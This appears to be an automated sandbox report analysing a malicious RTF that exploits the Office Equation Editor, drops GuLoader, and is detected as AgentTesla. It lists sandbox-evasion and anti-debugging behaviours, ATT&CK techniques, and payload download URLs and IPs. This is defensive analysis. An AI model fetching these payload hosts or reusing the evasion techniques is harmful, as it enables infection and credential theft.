            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=\MISV.EXEHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21129&AUTHKEY=AC3DY6XZGK4LCRCHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21130&AUTHKEY=AF6G200UHTICGQA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2660Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C015 rdtsc 9_2_0056C015
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,3_2_00406873
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C49
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,3_2_0040290B
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSystem information queried: ModuleInformationJump to behavior
            Source: CasPol.exe, 00000009.00000002.680256332.00000000008D0000.00000004.00000020.sdmpBinary or memory string: VMware_S
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=\misv.exehttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XZGk4Lcrchttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200UHTiCgqA
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C015 rdtsc 9_2_0056C015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00570CCB mov eax, dword ptr fs:[00000030h]9_2_00570CCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00570114 mov eax, dword ptr fs:[00000030h]9_2_00570114
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00567A91 mov eax, dword ptr fs:[00000030h]9_2_00567A91
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00572332 mov eax, dword ptr fs:[00000030h]9_2_00572332
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056B7B6 mov eax, dword ptr fs:[00000030h]9_2_0056B7B6

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 560000Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe" Jump to behavior
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Source: Yara matchFile source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsExploitation for Client Execution13Path InterceptionAccess Token Manipulation1Masquerading111OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Modify Registry1LSASS MemorySecurity Software Discovery411Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery5Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 532227 Sample: T81Ip9NCGi Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 57 Found malware configuration 2->57 59 Antivirus detection for URL or domain 2->59 61 Antivirus detection for dropped file 2->61 63 15 other signatures 2->63 9 EQNEDT32.EXE 12 2->9         started        14 WINWORD.EXE 291 19 2->14         started        process3 dnsIp4 51 192.3.122.180, 49165, 80 AS-COLOCROSSINGUS United States 9->51 39 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 9->39 dropped 41 C:\Users\Public\vbc.exe, PE32 9->41 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->75 16 vbc.exe 9 9->16         started        43 ~WRF{F8012674-B7CB...0-A31E79A66D61}.tmp, Composite 14->43 dropped file5 signatures6 process7 file8 35 C:\Users\user\AppData\Local\Temp\Acly3.exe, PE32 16->35 dropped 55 Multi AV Scanner detection for dropped file 16->55 20 Acly3.exe 16->20         started        signatures9 process10 signatures11 65 Writes to foreign memory regions 20->65 67 Tries to detect Any.run 20->67 69 Hides threads from debuggers 20->69 23 CasPol.exe 13 20->23         started        28 CasPol.exe 20->28         started        30 CasPol.exe 20->30         started        process12 dnsIp13 45 onedrive.live.com 23->45 47 fspzka.bl.files.1drv.com 23->47 49 2 other IPs or domains 23->49 37 C:\Users\user\AppData\Roaming\misv.exe, PE32 23->37 dropped 71 Tries to detect Any.run 23->71 73 Hides threads from debuggers 23->73 32 misv.exe 9 23->32         started        file14 signatures15 process16 signatures17 53 Machine Learning detection for dropped file 32->53

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            T81Ip9NCGi.rtf36%ReversingLabsDocument-RTF.Trojan.Heuristic
            T81Ip9NCGi.rtf100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\misv.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe20%ReversingLabsWin32.Downloader.GuLoader
            C:\Users\Public\vbc.exe20%ReversingLabsWin32.Downloader.GuLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://scas.openformatrg/drawml/2006/main0%Avira URL Cloudsafe
            http://192.3.122.180/1100/vbc.exe100%Avira URL Cloudmalware
            http://ocsp.entrust.net030%URL Reputationsafe
            http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://schemas.open0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            onedrive.live.com
            		unknown
            		unknownfalse
              		high
              eruitg.bl.files.1drv.com
              		unknown
              		unknownfalse
                		high
                fspzka.bl.files.1drv.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://192.3.122.180/1100/vbc.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://onedrive.live.com/download?cid=5A15FDA1AE9false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpfalse
                      		high
                      https://fspzka.bl.files.1drv.com/CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpfalse
                        		high
                        http://scas.openformatrg/drawml/2006/mainWINWORD.EXE, 00000000.00000002.566986051.00000000077FE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://investor.msn.comCasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtCasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpfalse
                            		high
                            http://crl.entrust.net/server1.crl0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpfalse
                              		high
                              http://ocsp.entrust.net03CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.openformatrg/package/2006/content-tWINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://fspzka.bl.files.1drv.com/y4mP7_EzD4E9pJoVHXNCm_aHG9sNUYaYn5ZLxRh4dzJ2jsCGVhpiD6B5BkejNSybMdSCasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmpfalse
                                		high
                                https://fspzka.bl.files.1drv.com/y4mA4TmJkclcR_hxludBD4dX7tD1sUxzesfsAA1g8l7yxjN7FTtZtQscxnySO3fUefxCasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://fspzka.bl.files.1drv.com/lU)CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.diginotar.nl/cps/pkioverheid0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.411004691.000000000040A000.00000008.00020000.sdmp, misv.exe, 0000000C.00000000.670443220.000000000040A000.00000008.00020000.sdmp, vbc.exe.1.dr, vbc[1].exe.1.dr, misv.exe.9.drfalse
                                      		high
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueAcly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oeCasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpfalse
                                        		high
                                        https://eruitg.bl.files.1drv.com/CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.openWINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XCasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpfalse
                                            		high
                                            https://onedrive.live.com/CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpfalse
                                              		high
                                              https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.680070003.0000000000884000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpfalse
                                                		high
                                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckAcly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpfalse
                                                  		high
                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.icra.org/vocabulary/.Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.openformatrg/package/2006/rWINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://investor.msn.com/CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpfalse
                                                      		high
                                                      http://www.%s.comPAWINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		low
                                                      https://eruitg.bl.files.1drv.com/y4muNEzpitWvAmX7Vz4E733dpYGfCYrMWu-PvveEpyz1hNKqOgAXlUDzjcpY7W274QgCasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://ocsp.entrust.net0DCasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://secure.comodo.com/CPS0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                                          		high
                                                          http://crl.entrust.net/2048ca.crl0CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpfalse
                                                            		high
                                                            https://onedrive.live.com/wCasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpfalse
                                                              		high

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              192.3.122.180
                                                              		unknownUnited States
                                                              		36352AS-COLOCROSSINGUStrue

                                                              General Information

                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                              Analysis ID:532227
                                                              Start date:01.12.2021
                                                              Start time:20:57:06
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 7m 37s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Sample file name:T81Ip9NCGi (renamed file extension from none to rtf)
                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winRTF@14/13@3/1
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 100% (good quality ratio 97.1%)
                                                              • Quality average: 84.4%
                                                              • Quality standard deviation: 23.8%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                              • Attach to Office via COM
                                                              • Scroll down
                                                              • Close Viewer
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.43.12
                                                              • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, l-0003.dc-msedge.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532227/sample/T81Ip9NCGi.rtf

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              20:57:18API Interceptor51x Sleep call for process: EQNEDT32.EXE modified
                                                              20:58:28API Interceptor213x Sleep call for process: Acly3.exe modified
                                                              20:59:17API Interceptor64x Sleep call for process: CasPol.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              192.3.122.180QEw7lxB2iE.rtfGet hashmaliciousBrowse
                                                              • 192.3.122.180/2200/vbc.exe
                                                              RFQ with Specification (Fitch Solutions).docxGet hashmaliciousBrowse
                                                              • 192.3.122.180/1100/vbc.exe
                                                              3wdkxO3rGv.rtfGet hashmaliciousBrowse
                                                              • 192.3.122.180/55667/vbc.exe
                                                              zoe3408r0Z.docxGet hashmaliciousBrowse
                                                              • 192.3.122.180/3222/vbc.exe

                                                              Domains

                                                              No context

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              AS-COLOCROSSINGUSQEw7lxB2iE.rtfGet hashmaliciousBrowse
                                                              • 192.3.122.180
                                                              REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                              • 23.94.174.144
                                                              P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                              • 198.23.251.13
                                                              PO6738H.xlsxGet hashmaliciousBrowse
                                                              • 198.23.251.13
                                                              VM845.htmlGet hashmaliciousBrowse
                                                              • 192.3.157.18
                                                              dJN1gSSJv5.exeGet hashmaliciousBrowse
                                                              • 107.172.73.191
                                                              REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                              • 23.94.174.144
                                                              Payment Advice.xlsxGet hashmaliciousBrowse
                                                              • 192.3.110.203
